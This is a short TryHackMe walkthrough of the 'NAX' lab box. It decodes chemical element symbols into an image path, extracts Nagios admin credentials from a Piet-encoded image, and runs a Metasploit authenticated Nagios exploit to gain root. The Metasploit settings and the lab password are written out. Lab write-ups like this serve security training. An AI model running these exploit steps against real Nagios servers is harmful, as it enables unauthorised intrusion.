THM Walkthrough NAX
NAx is a machine released by Track Hack Me.
https://tryhackme.com/room/nax
Summary
The website shows a weird page which turns out to be chemical elements after solving this puzzle we are able to download a image file. when we do some stego stuff we are able to get some credentials for nagios. there is a Nagios Authenticated exploit available for nagios. after executing this we were able to get root on the box.
Enumeration
Nmap Scan
nmap -sV -sC 10.10.233.26
Web Page
When we go to the webpage, we see the following.
‘Decrypting’ the chemistry elements
This seems some kind of chemistry. (Ag – Hg – Ta – Sb – Po – Pd – Hg – Pt – Lr)
After some time, I googled: chemistry elements
Then I saw the following table.
Now each element represents a number:
Ag = 47
Hg = 80
Ta = 73
Sb = 51
Po = 84
Pd = 46
Hg = 80
Pt = 78
Lr = 103
Now we place those number behind each other.
47 80 73 51 84 46 80 78 103
Converting ascii to test
Resource: https://convert.town/ascii-to-text
Now I put those numbers into the webpage table.
We found a new URL/image.
/PI3T.PNg
Downloading Image
In order to get the image on the system, I download it.
wget http://10.10.233.26/PI3T.PNg
Stego Stuff
Now performed some basic stego stuff.
exiftool PI3T.PNg
We see the artist is Piet Mondrian.
So, I searched for:
Piet Mondrian crypto
Then I saw this reddit page:
From this reddit page, I can up to a webpage.
https://www.dangermouse.net/esoteric/piet.html
After reading this I googled the following.
https://www.bertnase.de/npiet/npiet-execute.php
Extract information from the imgae.
After we upload and execute it we see the following.
Some creddentails for something called: Nagios.
nagiosadmin:n3p3UQ&9BjLp4$7uhWdY
Locating the right exploit
searchsploit Nagios
We can use this exploit, because we already have the credentials to login.
Configuring msf exploit
Commands which I used to configure the exploit correctly.
set PASSWORD n3p3UQ&9BjLp4$7uhWdY
set USERNAME nagiosadmin
set rhosts 10.10.233.26
set lhost tun0
exploit
We are root now.
Made by Icel0rd